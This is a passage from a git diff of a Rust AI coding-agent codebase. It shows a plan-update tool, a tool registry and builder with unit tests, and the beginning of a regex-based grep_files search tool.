for item in &update.plan {
|
||||
if let Some(old_status) = current_steps.get(&item.step) {
|
||||
// Check for invalid transitions
|
||||
match (old_status, &item.status) {
|
||||
(StepStatus::Completed, StepStatus::Pending) => {
|
||||
return PlanValidation::Warning(format!(
|
||||
"Step '{}' was completed but is now pending",
|
||||
item.step
|
||||
));
|
||||
}
|
||||
(StepStatus::Completed, StepStatus::InProgress) => {
|
||||
return PlanValidation::Warning(format!(
|
||||
"Step '{}' was completed but is now in progress",
|
||||
item.step
|
||||
));
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
PlanValidation::Ok
|
||||
}
|
||||
|
||||
// === UpdatePlanTool - ToolSpec implementation ===
|
||||
|
||||
/// Shared reference to `PlanState` for use across tools
|
||||
pub type SharedPlanState = Arc<Mutex<PlanState>>;
|
||||
|
||||
/// Create a new shared `PlanState`
|
||||
pub fn new_shared_plan_state() -> SharedPlanState {
|
||||
Arc::new(Mutex::new(PlanState::default()))
|
||||
}
|
||||
|
||||
/// Tool for updating the implementation plan
|
||||
pub struct UpdatePlanTool {
|
||||
plan_state: SharedPlanState,
|
||||
}
|
||||
|
||||
impl UpdatePlanTool {
|
||||
pub fn new(plan_state: SharedPlanState) -> Self {
|
||||
Self { plan_state }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for UpdatePlanTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"update_plan"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Update the implementation plan with steps and their status. Use this to track progress on implementation tasks. Each step has a description and status (pending, in_progress, completed). Optionally include an explanation of the overall approach."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> serde_json::Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"explanation": {
|
||||
"type": "string",
|
||||
"description": "Optional high-level explanation of the plan or approach"
|
||||
},
|
||||
"plan": {
|
||||
"type": "array",
|
||||
"description": "List of plan steps",
|
||||
"items": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"step": {
|
||||
"type": "string",
|
||||
"description": "Description of the step"
|
||||
},
|
||||
"status": {
|
||||
"type": "string",
|
||||
"enum": ["pending", "in_progress", "completed"],
|
||||
"description": "Step status"
|
||||
}
|
||||
},
|
||||
"required": ["step", "status"]
|
||||
}
|
||||
}
|
||||
},
|
||||
"required": ["plan"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::WritesFiles]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
input: serde_json::Value,
|
||||
_context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let explanation = input
|
||||
.get("explanation")
|
||||
.and_then(|v| v.as_str())
|
||||
.map(std::string::ToString::to_string);
|
||||
|
||||
let plan_items = input
|
||||
.get("plan")
|
||||
.and_then(|v| v.as_array())
|
||||
.ok_or_else(|| ToolError::invalid_input("Missing or invalid 'plan' array"))?;
|
||||
|
||||
let mut plan_args = Vec::new();
|
||||
for item in plan_items {
|
||||
let step = item
|
||||
.get("step")
|
||||
.and_then(|v| v.as_str())
|
||||
.ok_or_else(|| ToolError::invalid_input("Plan item missing 'step'"))?;
|
||||
|
||||
let status_str = item
|
||||
.get("status")
|
||||
.and_then(|v| v.as_str())
|
||||
.unwrap_or("pending");
|
||||
|
||||
let status = StepStatus::from_str(status_str).unwrap_or(StepStatus::Pending);
|
||||
|
||||
plan_args.push(PlanItemArg {
|
||||
step: step.to_string(),
|
||||
status,
|
||||
});
|
||||
}
|
||||
|
||||
let args = UpdatePlanArgs {
|
||||
explanation,
|
||||
plan: plan_args,
|
||||
};
|
||||
|
||||
let mut state = self
|
||||
.plan_state
|
||||
.lock()
|
||||
.map_err(|e| ToolError::execution_failed(format!("Failed to lock plan state: {e}")))?;
|
||||
|
||||
state.update(args);
|
||||
|
||||
let snapshot = state.snapshot();
|
||||
let (pending, in_progress, completed) = state.counts();
|
||||
let progress = state.progress_percent();
|
||||
|
||||
let result = serde_json::to_string_pretty(&snapshot).unwrap_or_else(|_| "{}".to_string());
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"Plan updated: {pending} pending, {in_progress} in progress, {completed} completed ({progress}% done)\n{result}"
|
||||
)))
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,617 @@
|
||||
//! Tool registry for managing and executing tools.
|
||||
//!
|
||||
//! The registry provides:
|
||||
//! - Dynamic tool registration
|
||||
//! - Tool lookup by name
|
||||
//! - Conversion to API Tool format
|
||||
//! - Filtering by capability
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::sync::Arc;
|
||||
|
||||
use serde_json::Value;
|
||||
|
||||
use crate::client::DeepSeekClient;
|
||||
use crate::duo::SharedDuoSession;
|
||||
use crate::models::Tool;
|
||||
use crate::rlm::SharedRlmSession;
|
||||
|
||||
use super::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
};
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Registry that holds all available tools.
|
||||
pub struct ToolRegistry {
|
||||
tools: HashMap<String, Arc<dyn ToolSpec>>,
|
||||
context: ToolContext,
|
||||
}
|
||||
|
||||
impl ToolRegistry {
|
||||
/// Create a new empty registry with the given context.
|
||||
#[must_use]
|
||||
pub fn new(context: ToolContext) -> Self {
|
||||
Self {
|
||||
tools: HashMap::new(),
|
||||
context,
|
||||
}
|
||||
}
|
||||
|
||||
/// Register a tool in the registry.
|
||||
pub fn register(&mut self, tool: Arc<dyn ToolSpec>) {
|
||||
let name = tool.name().to_string();
|
||||
if self.tools.insert(name.clone(), tool).is_some() {
|
||||
tracing::warn!("Overwriting existing tool: {}", name);
|
||||
}
|
||||
}
|
||||
|
||||
/// Register multiple tools at once.
|
||||
pub fn register_all(&mut self, tools: Vec<Arc<dyn ToolSpec>>) {
|
||||
for tool in tools {
|
||||
self.register(tool);
|
||||
}
|
||||
}
|
||||
|
||||
/// Get a tool by name.
|
||||
#[must_use]
|
||||
pub fn get(&self, name: &str) -> Option<Arc<dyn ToolSpec>> {
|
||||
self.tools.get(name).cloned()
|
||||
}
|
||||
|
||||
/// Check if a tool exists.
|
||||
#[must_use]
|
||||
pub fn contains(&self, name: &str) -> bool {
|
||||
self.tools.contains_key(name)
|
||||
}
|
||||
|
||||
/// Check if a tool supports parallel execution.
|
||||
#[must_use]
|
||||
pub fn tool_supports_parallel(&self, name: &str) -> bool {
|
||||
self.get(name)
|
||||
.map(|tool| tool.supports_parallel())
|
||||
.unwrap_or(false)
|
||||
}
|
||||
|
||||
/// Get all registered tool names.
|
||||
#[must_use]
|
||||
pub fn names(&self) -> Vec<&str> {
|
||||
self.tools.keys().map(std::string::String::as_str).collect()
|
||||
}
|
||||
|
||||
/// Get the number of registered tools.
|
||||
#[must_use]
|
||||
pub fn len(&self) -> usize {
|
||||
self.tools.len()
|
||||
}
|
||||
|
||||
/// Check if the registry is empty.
|
||||
#[must_use]
|
||||
pub fn is_empty(&self) -> bool {
|
||||
self.tools.is_empty()
|
||||
}
|
||||
|
||||
/// Get all registered tools.
|
||||
#[must_use]
|
||||
pub fn all(&self) -> Vec<Arc<dyn ToolSpec>> {
|
||||
self.tools.values().cloned().collect()
|
||||
}
|
||||
|
||||
/// Execute a tool by name with the given input.
|
||||
pub async fn execute(&self, name: &str, input: Value) -> Result<String, ToolError> {
|
||||
let tool = self
|
||||
.get(name)
|
||||
.ok_or_else(|| ToolError::not_available(format!("tool '{name}' is not registered")))?;
|
||||
|
||||
let result = tool.execute(input, &self.context).await?;
|
||||
Ok(result.content)
|
||||
}
|
||||
|
||||
/// Execute a tool by name, returning the full `ToolResult`.
|
||||
pub async fn execute_full(&self, name: &str, input: Value) -> Result<ToolResult, ToolError> {
|
||||
let tool = self
|
||||
.get(name)
|
||||
.ok_or_else(|| ToolError::not_available(format!("tool '{name}' is not registered")))?;
|
||||
|
||||
tool.execute(input, &self.context).await
|
||||
}
|
||||
|
||||
/// Execute a tool with an optional context override.
|
||||
///
|
||||
/// This is used for retrying tools with elevated sandbox policies.
|
||||
pub async fn execute_full_with_context(
|
||||
&self,
|
||||
name: &str,
|
||||
input: Value,
|
||||
context_override: Option<&ToolContext>,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let tool = self
|
||||
.get(name)
|
||||
.ok_or_else(|| ToolError::not_available(format!("tool '{name}' is not registered")))?;
|
||||
|
||||
let ctx = context_override.unwrap_or(&self.context);
|
||||
tool.execute(input, ctx).await
|
||||
}
|
||||
|
||||
/// Get the current tool context.
|
||||
#[must_use]
|
||||
pub fn context(&self) -> &ToolContext {
|
||||
&self.context
|
||||
}
|
||||
|
||||
/// Convert all tools to API Tool format for sending to the model.
|
||||
#[must_use]
|
||||
pub fn to_api_tools(&self) -> Vec<Tool> {
|
||||
self.tools
|
||||
.values()
|
||||
.map(|tool| Tool {
|
||||
name: tool.name().to_string(),
|
||||
description: tool.description().to_string(),
|
||||
input_schema: tool.input_schema(),
|
||||
cache_control: None,
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Convert tools to API Tool format with optional cache control on the last tool.
|
||||
#[must_use]
|
||||
pub fn to_api_tools_with_cache(&self, enable_cache: bool) -> Vec<Tool> {
|
||||
let mut tools = self.to_api_tools();
|
||||
if enable_cache && let Some(last) = tools.last_mut() {
|
||||
last.cache_control = Some(crate::models::CacheControl {
|
||||
cache_type: "ephemeral".to_string(),
|
||||
});
|
||||
}
|
||||
tools
|
||||
}
|
||||
|
||||
/// Filter tools by capability.
|
||||
#[must_use]
|
||||
pub fn filter_by_capability(&self, capability: ToolCapability) -> Vec<Arc<dyn ToolSpec>> {
|
||||
self.tools
|
||||
.values()
|
||||
.filter(|t| t.capabilities().contains(&capability))
|
||||
.cloned()
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Get read-only tools (for Normal mode).
|
||||
#[must_use]
|
||||
pub fn read_only_tools(&self) -> Vec<Arc<dyn ToolSpec>> {
|
||||
self.tools
|
||||
.values()
|
||||
.filter(|t| t.is_read_only())
|
||||
.cloned()
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Get tools that require approval.
|
||||
#[must_use]
|
||||
pub fn approval_required_tools(&self) -> Vec<Arc<dyn ToolSpec>> {
|
||||
self.tools
|
||||
.values()
|
||||
.filter(|t| t.approval_requirement() == ApprovalRequirement::Required)
|
||||
.cloned()
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Get tools that suggest approval.
|
||||
#[must_use]
|
||||
pub fn approval_suggested_tools(&self) -> Vec<Arc<dyn ToolSpec>> {
|
||||
self.tools
|
||||
.values()
|
||||
.filter(|t| {
|
||||
matches!(
|
||||
t.approval_requirement(),
|
||||
ApprovalRequirement::Suggest | ApprovalRequirement::Required
|
||||
)
|
||||
})
|
||||
.cloned()
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Update the context (e.g., when workspace changes).
|
||||
pub fn set_context(&mut self, context: ToolContext) {
|
||||
self.context = context;
|
||||
}
|
||||
|
||||
/// Get a mutable reference to the current context.
|
||||
#[must_use]
|
||||
pub fn context_mut(&mut self) -> &mut ToolContext {
|
||||
&mut self.context
|
||||
}
|
||||
|
||||
/// Remove a tool by name.
|
||||
#[must_use]
|
||||
pub fn remove(&mut self, name: &str) -> Option<Arc<dyn ToolSpec>> {
|
||||
self.tools.remove(name)
|
||||
}
|
||||
|
||||
/// Clear all tools from the registry.
|
||||
pub fn clear(&mut self) {
|
||||
self.tools.clear();
|
||||
}
|
||||
}
|
||||
|
||||
/// Builder for constructing a `ToolRegistry` with common tools.
|
||||
pub struct ToolRegistryBuilder {
|
||||
tools: Vec<Arc<dyn ToolSpec>>,
|
||||
}
|
||||
|
||||
impl ToolRegistryBuilder {
|
||||
/// Create a new builder.
|
||||
#[must_use]
|
||||
pub fn new() -> Self {
|
||||
Self { tools: Vec::new() }
|
||||
}
|
||||
|
||||
/// Add a custom tool.
|
||||
#[must_use]
|
||||
pub fn with_tool(mut self, tool: Arc<dyn ToolSpec>) -> Self {
|
||||
self.tools.push(tool);
|
||||
self
|
||||
}
|
||||
|
||||
/// Add multiple tools.
|
||||
#[must_use]
|
||||
pub fn with_tools(mut self, tools: Vec<Arc<dyn ToolSpec>>) -> Self {
|
||||
self.tools.extend(tools);
|
||||
self
|
||||
}
|
||||
|
||||
/// Include file tools (read, write, edit, list).
|
||||
#[must_use]
|
||||
pub fn with_file_tools(self) -> Self {
|
||||
use super::file::{EditFileTool, ListDirTool, ReadFileTool, WriteFileTool};
|
||||
self.with_tool(Arc::new(ReadFileTool))
|
||||
.with_tool(Arc::new(WriteFileTool))
|
||||
.with_tool(Arc::new(EditFileTool))
|
||||
.with_tool(Arc::new(ListDirTool))
|
||||
}
|
||||
|
||||
/// Include only read-only file tools (read, list).
|
||||
#[must_use]
|
||||
pub fn with_read_only_file_tools(self) -> Self {
|
||||
use super::file::{ListDirTool, ReadFileTool};
|
||||
self.with_tool(Arc::new(ReadFileTool))
|
||||
.with_tool(Arc::new(ListDirTool))
|
||||
}
|
||||
|
||||
/// Include shell execution tool.
|
||||
#[must_use]
|
||||
pub fn with_shell_tools(self) -> Self {
|
||||
use super::shell::ExecShellTool;
|
||||
self.with_tool(Arc::new(ExecShellTool))
|
||||
}
|
||||
|
||||
/// Include search tools (`grep_files`).
|
||||
#[must_use]
|
||||
pub fn with_search_tools(self) -> Self {
|
||||
use super::search::GrepFilesTool;
|
||||
self.with_tool(Arc::new(GrepFilesTool))
|
||||
}
|
||||
|
||||
/// Include web search tools.
|
||||
#[must_use]
|
||||
pub fn with_web_tools(self) -> Self {
|
||||
use super::web_search::WebSearchTool;
|
||||
self.with_tool(Arc::new(WebSearchTool))
|
||||
}
|
||||
|
||||
/// Include patch tools (`apply_patch`).
|
||||
#[must_use]
|
||||
pub fn with_patch_tools(self) -> Self {
|
||||
use super::patch::ApplyPatchTool;
|
||||
self.with_tool(Arc::new(ApplyPatchTool))
|
||||
}
|
||||
|
||||
/// Include note tool.
|
||||
#[must_use]
|
||||
pub fn with_note_tool(self) -> Self {
|
||||
use super::shell::NoteTool;
|
||||
self.with_tool(Arc::new(NoteTool))
|
||||
}
|
||||
|
||||
/// Include all agent tools (file tools + shell + note + search + patch).
|
||||
#[must_use]
|
||||
pub fn with_agent_tools(self, allow_shell: bool) -> Self {
|
||||
let builder = self
|
||||
.with_file_tools()
|
||||
.with_note_tool()
|
||||
.with_search_tools()
|
||||
.with_web_tools()
|
||||
.with_patch_tools();
|
||||
|
||||
if allow_shell {
|
||||
builder.with_shell_tools()
|
||||
} else {
|
||||
builder
|
||||
}
|
||||
}
|
||||
|
||||
/// Include the todo tool with a shared `TodoList`.
|
||||
#[must_use]
|
||||
pub fn with_todo_tool(self, todo_list: super::todo::SharedTodoList) -> Self {
|
||||
use super::todo::{TodoAddTool, TodoListTool, TodoUpdateTool, TodoWriteTool};
|
||||
self.with_tool(Arc::new(TodoWriteTool::new(todo_list.clone())))
|
||||
.with_tool(Arc::new(TodoAddTool::new(todo_list.clone())))
|
||||
.with_tool(Arc::new(TodoUpdateTool::new(todo_list.clone())))
|
||||
.with_tool(Arc::new(TodoListTool::new(todo_list)))
|
||||
}
|
||||
|
||||
/// Include the plan tool with a shared `PlanState`.
|
||||
#[must_use]
|
||||
pub fn with_plan_tool(self, plan_state: super::plan::SharedPlanState) -> Self {
|
||||
use super::plan::UpdatePlanTool;
|
||||
self.with_tool(Arc::new(UpdatePlanTool::new(plan_state)))
|
||||
}
|
||||
|
||||
/// Include all agent tools plus todo and plan tools.
|
||||
#[must_use]
|
||||
pub fn with_full_agent_tools(
|
||||
self,
|
||||
allow_shell: bool,
|
||||
todo_list: super::todo::SharedTodoList,
|
||||
plan_state: super::plan::SharedPlanState,
|
||||
) -> Self {
|
||||
self.with_agent_tools(allow_shell)
|
||||
.with_todo_tool(todo_list)
|
||||
.with_plan_tool(plan_state)
|
||||
}
|
||||
|
||||
/// Include RLM tools for context execution and sub-queries.
|
||||
#[must_use]
|
||||
pub fn with_rlm_tools(
|
||||
self,
|
||||
session: SharedRlmSession,
|
||||
client: Option<DeepSeekClient>,
|
||||
model: String,
|
||||
) -> Self {
|
||||
self.with_tool(Arc::new(super::rlm::RlmExecTool::new(session.clone())))
|
||||
.with_tool(Arc::new(super::rlm::RlmLoadTool::new(session.clone())))
|
||||
.with_tool(Arc::new(super::rlm::RlmStatusTool::new(session.clone())))
|
||||
.with_tool(Arc::new(super::rlm::RlmQueryTool::new(
|
||||
session, client, model,
|
||||
)))
|
||||
}
|
||||
|
||||
/// Include Duo tools for dialectical autocoding.
|
||||
#[must_use]
|
||||
pub fn with_duo_tools(self, session: SharedDuoSession) -> Self {
|
||||
use super::duo::{DuoAdvanceTool, DuoCoachTool, DuoInitTool, DuoPlayerTool, DuoStatusTool};
|
||||
self.with_tool(Arc::new(DuoInitTool::new(session.clone())))
|
||||
.with_tool(Arc::new(DuoPlayerTool::new(session.clone())))
|
||||
.with_tool(Arc::new(DuoCoachTool::new(session.clone())))
|
||||
.with_tool(Arc::new(DuoAdvanceTool::new(session.clone())))
|
||||
.with_tool(Arc::new(DuoStatusTool::new(session)))
|
||||
}
|
||||
|
||||
/// Include sub-agent management tools.
|
||||
#[must_use]
|
||||
pub fn with_subagent_tools(
|
||||
self,
|
||||
manager: super::subagent::SharedSubAgentManager,
|
||||
runtime: super::subagent::SubAgentRuntime,
|
||||
) -> Self {
|
||||
use super::subagent::{AgentCancelTool, AgentListTool, AgentResultTool, AgentSpawnTool};
|
||||
|
||||
self.with_tool(Arc::new(AgentSpawnTool::new(manager.clone(), runtime)))
|
||||
.with_tool(Arc::new(AgentResultTool::new(manager.clone())))
|
||||
.with_tool(Arc::new(AgentCancelTool::new(manager.clone())))
|
||||
.with_tool(Arc::new(AgentListTool::new(manager)))
|
||||
}
|
||||
|
||||
/// Build the registry with the given context.
|
||||
#[must_use]
|
||||
pub fn build(self, context: ToolContext) -> ToolRegistry {
|
||||
let mut registry = ToolRegistry::new(context);
|
||||
registry.register_all(self.tools);
|
||||
registry
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for ToolRegistryBuilder {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use std::sync::Arc;
|
||||
|
||||
use serde_json::{Value, json};
|
||||
use tempfile::tempdir;
|
||||
|
||||
use crate::tools::ToolRegistryBuilder;
|
||||
use crate::tools::spec::{
|
||||
ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec, required_str,
|
||||
};
|
||||
|
||||
use super::ToolRegistry;
|
||||
|
||||
/// A simple test tool for unit testing
|
||||
struct TestTool {
|
||||
name: String,
|
||||
description: String,
|
||||
}
|
||||
|
||||
#[async_trait::async_trait]
|
||||
impl ToolSpec for TestTool {
|
||||
fn name(&self) -> &str {
|
||||
&self.name
|
||||
}
|
||||
|
||||
fn description(&self) -> &str {
|
||||
&self.description
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"message": { "type": "string" }
|
||||
},
|
||||
"required": ["message"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
input: Value,
|
||||
_context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let message = required_str(&input, "message")?;
|
||||
Ok(ToolResult::success(format!("Echo: {message}")))
|
||||
}
|
||||
}
|
||||
|
||||
fn make_test_tool(name: &str) -> Arc<TestTool> {
|
||||
Arc::new(TestTool {
|
||||
name: name.to_string(),
|
||||
description: "A test tool".to_string(),
|
||||
})
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_registry_register_and_get() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
let tool = make_test_tool("test_tool");
|
||||
registry.register(tool);
|
||||
|
||||
assert!(registry.contains("test_tool"));
|
||||
assert!(!registry.contains("nonexistent"));
|
||||
assert_eq!(registry.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_registry_names() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("tool_a"));
|
||||
registry.register(make_test_tool("tool_b"));
|
||||
|
||||
let names = registry.names();
|
||||
assert_eq!(names.len(), 2);
|
||||
assert!(names.contains(&"tool_a"));
|
||||
assert!(names.contains(&"tool_b"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_registry_to_api_tools() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("my_tool"));
|
||||
|
||||
let api_tools = registry.to_api_tools();
|
||||
assert_eq!(api_tools.len(), 1);
|
||||
assert_eq!(api_tools[0].name, "my_tool");
|
||||
assert_eq!(api_tools[0].description, "A test tool");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_registry_remove() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("removable"));
|
||||
assert!(registry.contains("removable"));
|
||||
|
||||
let _ = registry.remove("removable");
|
||||
assert!(!registry.contains("removable"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_registry_clear() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("tool1"));
|
||||
registry.register(make_test_tool("tool2"));
|
||||
assert_eq!(registry.len(), 2);
|
||||
|
||||
registry.clear();
|
||||
assert!(registry.is_empty());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_registry_execute() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("echo"));
|
||||
|
||||
let result = registry
|
||||
.execute("echo", json!({"message": "hello"}))
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert_eq!(result, "Echo: hello");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_registry_execute_unknown_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let registry = ToolRegistry::new(ctx);
|
||||
|
||||
let result = registry.execute("nonexistent", json!({})).await;
|
||||
assert!(result.is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_builder_basic() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let registry = ToolRegistryBuilder::new()
|
||||
.with_tool(make_test_tool("custom"))
|
||||
.build(ctx);
|
||||
|
||||
assert!(registry.contains("custom"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_filter_by_capability() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("readonly_tool"));
|
||||
|
||||
let readonly = registry.filter_by_capability(ToolCapability::ReadOnly);
|
||||
assert_eq!(readonly.len(), 1);
|
||||
|
||||
let writes = registry.filter_by_capability(ToolCapability::WritesFiles);
|
||||
assert_eq!(writes.len(), 0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_read_only_tools() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
let mut registry = ToolRegistry::new(ctx);
|
||||
|
||||
registry.register(make_test_tool("reader"));
|
||||
|
||||
let readonly = registry.read_only_tools();
|
||||
assert_eq!(readonly.len(), 1);
|
||||
assert_eq!(readonly[0].name(), "reader");
|
||||
}
|
||||
}
|
||||
+1047
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,551 @@
|
||||
//! Search tools: `grep_files` for code search
|
||||
//!
|
||||
//! These tools provide powerful code search capabilities within the workspace,
|
||||
//! similar to ripgrep/grep functionality.
|
||||
|
||||
use super::spec::{
|
||||
ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec, optional_bool, optional_str,
|
||||
optional_u64, required_str,
|
||||
};
|
||||
use async_trait::async_trait;
|
||||
use regex::Regex;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::{Value, json};
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
/// Maximum number of results to return to avoid overwhelming output
|
||||
const MAX_RESULTS: usize = 100;
|
||||
|
||||
/// Maximum file size to search (skip large binaries)
|
||||
const MAX_FILE_SIZE: u64 = 10 * 1024 * 1024; // 10MB
|
||||
|
||||
/// Result of a grep match
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct GrepMatch {
|
||||
pub file: String,
|
||||
pub line_number: usize,
|
||||
pub line: String,
|
||||
pub context_before: Vec<String>,
|
||||
pub context_after: Vec<String>,
|
||||
}
|
||||
|
||||
/// Tool for searching files using regex patterns
|
||||
pub struct GrepFilesTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for GrepFilesTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"grep_files"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Search for a regex pattern in files within the workspace. Returns matching lines with context."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"pattern": {
|
||||
"type": "string",
|
||||
"description": "Regular expression pattern to search for"
|
||||
},
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Directory or file to search (relative to workspace, default: .)"
|
||||
},
|
||||
"include": {
|
||||
"type": "array",
|
||||
"items": {"type": "string"},
|
||||
"description": "Glob patterns for files to include (e.g., ['*.rs', '*.ts'])"
|
||||
},
|
||||
"exclude": {
|
||||
"type": "array",
|
||||
"items": {"type": "string"},
|
||||
"description": "Glob patterns for files to exclude (e.g., ['*.min.js', 'node_modules/*'])"
|
||||
},
|
||||
"context_lines": {
|
||||
"type": "integer",
|
||||
"description": "Number of context lines before and after each match (default: 2)"
|
||||
},
|
||||
"case_insensitive": {
|
||||
"type": "boolean",
|
||||
"description": "Whether to perform case-insensitive matching (default: false)"
|
||||
},
|
||||
"max_results": {
|
||||
"type": "integer",
|
||||
"description": "Maximum number of results to return (default: 100)"
|
||||
}
|
||||
},
|
||||
"required": ["pattern"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly, ToolCapability::Sandboxable]
|
||||
}
|
||||
|
||||
fn supports_parallel(&self) -> bool {
|
||||
true
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let pattern_str = required_str(&input, "pattern")?;
|
||||
let path_str = optional_str(&input, "path").unwrap_or(".");
|
||||
let context_lines =
|
||||
usize::try_from(optional_u64(&input, "context_lines", 2)).unwrap_or(usize::MAX);
|
||||
let case_insensitive = optional_bool(&input, "case_insensitive", false);
|
||||
let max_results = usize::try_from(optional_u64(&input, "max_results", MAX_RESULTS as u64))
|
||||
.unwrap_or(MAX_RESULTS);
|
||||
|
||||
// Parse include patterns
|
||||
let include_patterns: Vec<String> = input
|
||||
.get("include")
|
||||
.and_then(|v| v.as_array())
|
||||
.map(|arr| {
|
||||
arr.iter()
|
||||
.filter_map(|v| v.as_str().map(String::from))
|
||||
.collect()
|
||||
})
|
||||
.unwrap_or_default();
|
||||
|
||||
// Parse exclude patterns
|
||||
let exclude_patterns: Vec<String> =
|
||||
input.get("exclude").and_then(|v| v.as_array()).map_or_else(
|
||||
|| {
|
||||
// Default exclusions for common non-code directories
|
||||
vec![
|
||||
"node_modules/*".to_string(),
|
||||
".git/*".to_string(),
|
||||
"target/*".to_string(),
|
||||
"*.min.js".to_string(),
|
||||
"*.min.css".to_string(),
|
||||
"dist/*".to_string(),
|
||||
"build/*".to_string(),
|
||||
"__pycache__/*".to_string(),
|
||||
".venv/*".to_string(),
|
||||
"venv/*".to_string(),
|
||||
]
|
||||
},
|
||||
|arr| {
|
||||
arr.iter()
|
||||
.filter_map(|v| v.as_str().map(String::from))
|
||||
.collect()
|
||||
},
|
||||
);
|
||||
|
||||
// Build regex
|
||||
let regex_pattern = if case_insensitive {
|
||||
format!("(?i){pattern_str}")
|
||||
} else {
|
||||
pattern_str.to_string()
|
||||
};
|
||||
|
||||
let regex = Regex::new(®ex_pattern)
|
||||
.map_err(|e| ToolError::invalid_input(format!("Invalid regex pattern: {e}")))?;
|
||||
|
||||
// Resolve search path
|
||||
let search_path = context.resolve_path(path_str)?;
|
||||
|
||||
// Collect files to search
|
||||
